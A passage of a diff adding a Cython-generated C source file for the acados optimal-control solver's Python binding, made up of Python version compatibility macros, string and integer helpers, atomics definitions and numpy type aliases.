PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #ifdef __cplusplus + #define __PYX_EXTERN_C extern "C" + #else + #define __PYX_EXTERN_C extern + #endif +#endif + +#define __PYX_HAVE__acados_template__acados_ocp_solver_pyx +#define __PYX_HAVE_API__acados_template__acados_ocp_solver_pyx +/* Early includes */ +#include +#include "acados/ocp_nlp/ocp_nlp_common.h" +#include "acados_c/ocp_nlp_interface.h" +#include "acados_solver_long.h" +#include + + /* Using NumPy API declarations from "numpy/__init__.cython-30.pxd" */ + +#include "numpy/arrayobject.h" +#include "numpy/ndarrayobject.h" +#include "numpy/ndarraytypes.h" +#include "numpy/arrayscalars.h" +#include "numpy/ufuncobject.h" +#include "pythread.h" +#include +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* Header.proto */ +#if !defined(CYTHON_CCOMPLEX) + #if defined(__cplusplus) + #define CYTHON_CCOMPLEX 1 + #elif (defined(_Complex_I) && !defined(_MSC_VER)) || ((defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_COMPLEX__)) + #define CYTHON_CCOMPLEX 1 + #else + #define CYTHON_CCOMPLEX 0 + #endif +#endif +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #include + #else + #include + #endif +#endif +#if CYTHON_CCOMPLEX && !defined(__cplusplus) && defined(__sun__) && defined(__GNUC__) + #undef _Complex_I + #define _Complex_I 1.0fj +#endif + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "third_party/acados/acados_template/acados_ocp_solver_pyx.pyx", + "", + "__init__.cython-30.pxd", + "type.pxd", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* ForceInitThreads.proto */ +#ifndef __PYX_FORCE_INIT_THREADS + #define __PYX_FORCE_INIT_THREADS 0 +#endif + +/* NoFastGil.proto */ +#define __Pyx_PyGILState_Ensure PyGILState_Ensure +#define __Pyx_PyGILState_Release PyGILState_Release +#define __Pyx_FastGIL_Remember() +#define __Pyx_FastGIL_Forget() +#define __Pyx_FastGilFuncInit() + +/* BufferFormatStructs.proto */ +struct __Pyx_StructField_; +#define __PYX_BUF_FLAGS_PACKED_STRUCT (1 << 0) +typedef struct { + const char* name; + struct __Pyx_StructField_* fields; + size_t size; + size_t arraysize[8]; + int ndim; + char typegroup; + char is_unsigned; + int flags; +} __Pyx_TypeInfo; +typedef struct __Pyx_StructField_ { + __Pyx_TypeInfo* type; + const char* name; + size_t offset; +} __Pyx_StructField; +typedef struct { + __Pyx_StructField* field; + size_t parent_offset; +} __Pyx_BufFmt_StackElem; +typedef struct { + __Pyx_StructField root; + __Pyx_BufFmt_StackElem* head; + size_t fmt_offset; + size_t new_count, enc_count; + size_t struct_alignment; + int is_complex; + char enc_type; + char new_packmode; + char enc_packmode; + char is_valid_array; +} __Pyx_BufFmt_Context; + +/* Atomics.proto */ +#include +#ifndef CYTHON_ATOMICS + #define CYTHON_ATOMICS 1 +#endif +#define __PYX_CYTHON_ATOMICS_ENABLED() CYTHON_ATOMICS +#define __pyx_atomic_int_type int +#define __pyx_nonatomic_int_type int +#if CYTHON_ATOMICS && (defined(__STDC_VERSION__) &&\ + (__STDC_VERSION__ >= 201112L) &&\ + !defined(__STDC_NO_ATOMICS__)) + #include +#elif CYTHON_ATOMICS && (defined(__cplusplus) && (\ + (__cplusplus >= 201103L) ||\ + (defined(_MSC_VER) && _MSC_VER >= 1700))) + #include +#endif +#if CYTHON_ATOMICS && (defined(__STDC_VERSION__) &&\ + (__STDC_VERSION__ >= 201112L) &&\ + !defined(__STDC_NO_ATOMICS__) &&\ + ATOMIC_INT_LOCK_FREE == 2) + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type atomic_int + #define __pyx_atomic_incr_aligned(value) atomic_fetch_add_explicit(value, 1, memory_order_relaxed) + #define __pyx_atomic_decr_aligned(value) atomic_fetch_sub_explicit(value, 1, memory_order_acq_rel) + #if defined(__PYX_DEBUG_ATOMICS) && defined(_MSC_VER) + #pragma message ("Using standard C atomics") + #elif defined(__PYX_DEBUG_ATOMICS) + #warning "Using standard C atomics" + #endif +#elif CYTHON_ATOMICS && (defined(__cplusplus) && (\ + (__cplusplus >= 201103L) ||\ +\ + (defined(_MSC_VER) && _MSC_VER >= 1700)) &&\ + ATOMIC_INT_LOCK_FREE == 2) + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type std::atomic_int + #define __pyx_atomic_incr_aligned(value) std::atomic_fetch_add_explicit(value, 1, std::memory_order_relaxed) + #define __pyx_atomic_decr_aligned(value) std::atomic_fetch_sub_explicit(value, 1, std::memory_order_acq_rel) + #if defined(__PYX_DEBUG_ATOMICS) && defined(_MSC_VER) + #pragma message ("Using standard C++ atomics") + #elif defined(__PYX_DEBUG_ATOMICS) + #warning "Using standard C++ atomics" + #endif +#elif CYTHON_ATOMICS && (__GNUC__ >= 5 || (__GNUC__ == 4 &&\ + (__GNUC_MINOR__ > 1 ||\ + (__GNUC_MINOR__ == 1 && __GNUC_PATCHLEVEL__ >= 2)))) + #define __pyx_atomic_incr_aligned(value) __sync_fetch_and_add(value, 1) + #define __pyx_atomic_decr_aligned(value) __sync_fetch_and_sub(value, 1) + #ifdef __PYX_DEBUG_ATOMICS + #warning "Using GNU atomics" + #endif +#elif CYTHON_ATOMICS && defined(_MSC_VER) + #include + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type long + #define __pyx_nonatomic_int_type long + #pragma intrinsic (_InterlockedExchangeAdd) + #define __pyx_atomic_incr_aligned(value) _InterlockedExchangeAdd(value, 1) + #define __pyx_atomic_decr_aligned(value) _InterlockedExchangeAdd(value, -1) + #ifdef __PYX_DEBUG_ATOMICS + #pragma message ("Using MSVC atomics") + #endif +#else + #undef CYTHON_ATOMICS + #define CYTHON_ATOMICS 0 + #ifdef __PYX_DEBUG_ATOMICS + #warning "Not using atomics" + #endif +#endif +#if CYTHON_ATOMICS + #define __pyx_add_acquisition_count(memview)\ + __pyx_atomic_incr_aligned(__pyx_get_slice_count_pointer(memview)) + #define __pyx_sub_acquisition_count(memview)\ + __pyx_atomic_decr_aligned(__pyx_get_slice_count_pointer(memview)) +#else + #define __pyx_add_acquisition_count(memview)\ + __pyx_add_acquisition_count_locked(__pyx_get_slice_count_pointer(memview), memview->lock) + #define __pyx_sub_acquisition_count(memview)\ + __pyx_sub_acquisition_count_locked(__pyx_get_slice_count_pointer(memview), memview->lock) +#endif + +/* MemviewSliceStruct.proto */ +struct __pyx_memoryview_obj; +typedef struct { + struct __pyx_memoryview_obj *memview; + char *data; + Py_ssize_t shape[8]; + Py_ssize_t strides[8]; + Py_ssize_t suboffsets[8]; +} __Pyx_memviewslice; +#define __Pyx_MemoryView_Len(m) (m.shape[0]) + +/* #### Code section: numeric_typedefs ### */ + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":731 + * # in Cython to enable them only on the right systems. + * + * ctypedef npy_int8 int8_t # <<<<<<<<<<<<<< + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + */ +typedef npy_int8 __pyx_t_5numpy_int8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":732 + * + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t # <<<<<<<<<<<<<< + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t + */ +typedef npy_int16 __pyx_t_5numpy_int16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":733 + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t # <<<<<<<<<<<<<< + * ctypedef npy_int64 int64_t + * #ctypedef npy_int96 int96_t + */ +typedef npy_int32 __pyx_t_5numpy_int32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":734 + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t # <<<<<<<<<<<<<< + * #ctypedef npy_int96 int96_t + * #ctypedef npy_int128 int128_t + */ +typedef npy_int64 __pyx_t_5numpy_int64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":738 + * #ctypedef npy_int128 int128_t + * + * ctypedef npy_uint8 uint8_t # <<<<<<<<<<<<<< + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + */ +typedef npy_uint8 __pyx_t_5numpy_uint8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":739 + * + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t # <<<<<<<<<<<<<< + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t + */ +typedef npy_uint16 __pyx_t_5numpy_uint16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":740 + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t # <<<<<<<<<<<<<< + * ctypedef npy_uint64 uint64_t + * #ctypedef npy_uint96 uint96_t + */ +typedef npy_uint32 __pyx_t_5numpy_uint32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":741 + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t # <<<<<<<<<<<<<< + * #ctypedef npy_uint96 uint96_t + * #ctypedef npy_uint128 uint128_t + */ +typedef npy_uint64 __pyx_t_5numpy_uint64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":745 + * #ctypedef npy_uint128 uint128_t + * + * ctypedef npy_float32 float32_t # <<<<<<<<<<<<<< + * ctypedef npy_float64 float64_t + * #ctypedef npy_float80 float80_t + */ +typedef npy_float32 __pyx_t_5numpy_float32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":746 + * + * ctypedef npy_float32 float32_t + * ctypedef npy_float64 float64_t # <<<<<<<<<<<<<< + * #ctypedef npy_float80 float80_t + * #ctypedef npy_float128 float128_t + */ +typedef npy_float64 __pyx_t_5numpy_float64_t; + +/* 